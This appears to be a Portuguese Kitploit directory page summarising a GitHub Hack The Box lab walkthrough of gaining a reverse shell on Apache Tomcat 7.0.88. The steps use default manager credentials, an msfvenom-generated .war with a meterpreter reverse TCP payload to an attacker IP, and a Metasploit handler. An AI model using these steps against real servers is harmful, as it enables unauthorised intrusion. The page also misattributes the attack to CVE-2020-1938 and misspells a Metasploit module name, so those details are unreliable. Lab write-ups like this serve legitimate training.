Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-1938-Exploitation — Passo a passo para exploração do CVE-2020-1938 (Apache Tomcat upload arbitrário de JSP para RCE) usando msfvenom e Metasploit em um ambiente Hack The Box de laboratório. | Kitploit
Ferramentas/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubhopsypopsy8/cve-2020-1938-exploitation

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

CVE-2020-1938-Exploitation

Passo a passo para exploração do CVE-2020-1938 (Apache Tomcat upload arbitrário de JSP para RCE) usando msfvenom e Metasploit em um ambiente Hack The Box de laboratório.

Ver Repositório
3há 1 anoAinda não revisado
Compartilhar

Exploração CVE-2020-1938

Apache Tomcat upload arbitrário de JSP levando a RCE

Descrição

CVE-2020-1938 é uma vulnerabilidade crítica que afeta o Apache Tomcat de 9.0.0.M1 a 9.0.0.30, 8.5.0 a 8.5.50 e 7.0.0 a 7.0.99 ⚠️ Isto foi explorado num laboratório Hack The Box.

🔗 Referência: Entrada NIST NVD

Reconhecimento

Identificando um Vetor de Ataque

imagem
  1. O site possui credenciais padrão para o recurso Server Status.

  2. Esta interface indica que a versão é Apache Tomcat/7.0.88, arquitetura de 64 bits.

  3. A partir desta interface, navegamos para listar aplicações que expõem um recurso de Upload de arquivos .war.

  4. Após o upload bem-sucedido, o arquivo .war é executado em /directory/filename

  • A pesquisa sobre a versão do Apache Tomcat confirmou a vulnerabilidade ao CVE-2020-1938

  • Exploração

  • Gerando o Arquivo .war

    root@kitploit:~
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
    

    Usando o msfvenom, que é um gerador de payloads do metasploit, geramos o nosso payload exploit.war.

    1. -p windows/x64/meterpreter_reverse_tcp é o tipo de payload (no nosso caso, 64 bits, conforme identificado no Server Status)
    2. LHOST=10.10.14.3 LPORT=3004 são os detalhes de conexão reversa para a máquina do atacante
    3. -f war é o tipo de arquivo
    4. -o exploit.war é o nome do arquivo de saída

    Após a geração do arquivo, entre no arquivo e encontre o nome do arquivo .jsp, por exemplo, gcvxdtmxvw.jsp, e guarde-o para mais tarde.

    Configurando o metasploit

    root@kitploit:~
    msfconsole
    use exploit/multi/hanlder
    Set LHOST 10.10.14.3
    Set LPORT 3004
    

    Usando o msfconsole, configuramos um listener que aguarda a execução do nosso payload.

    Fazendo Upload e Executando o arquivo malicioso

    imagem
    imagem

    Fazemos upload da nossa imagem na seção de deploy, após o que atualizamos a tela e verificamos que o arquivo foi carregado com sucesso. Para concluir a exploração, devemos navegar até o caminho ip/hacked/gcvxdtmxvw.jsp.

    imagem

    Isso faz com que a requisição fique pendente, no entanto, conseguimos ver localmente na nossa máquina que temos uma conexão reversa.

    Baixar ferramenta